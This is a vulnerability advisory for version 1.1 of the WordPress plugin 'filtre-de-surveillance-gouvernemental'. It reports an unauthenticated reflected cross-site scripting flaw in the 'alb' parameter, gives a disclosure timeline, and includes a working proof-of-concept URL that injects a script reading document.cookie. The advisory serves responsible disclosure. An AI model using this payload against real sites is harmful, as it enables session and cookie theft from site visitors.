wp-plugin : filtre-de-surveillance-gouvernemental

Plugin Details
Plugin Name: wp-plugin : filtre-de-surveillance-gouvernemental
Effected Version : 1.1 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
 http://localhost/wp-content/plugins/filtre-de-surveillance-gouvernemental/filtregouv/filtregouv.php?alb=alb"><script>alert(document.cookie)</script>&

 

Vulnerable Parameter : alb

 

Type of XSS : Reflected


Disclosure Timeline
Vendor Contacted : 2014-01-04
Plugin Status : Updated on
Public Disclosure : July 7, 2014
CVE Number :
Plugin Description :
[ Ce plugin permet l'affichage d'une page de sensibilisation au danger du filtrage sur Internet. ]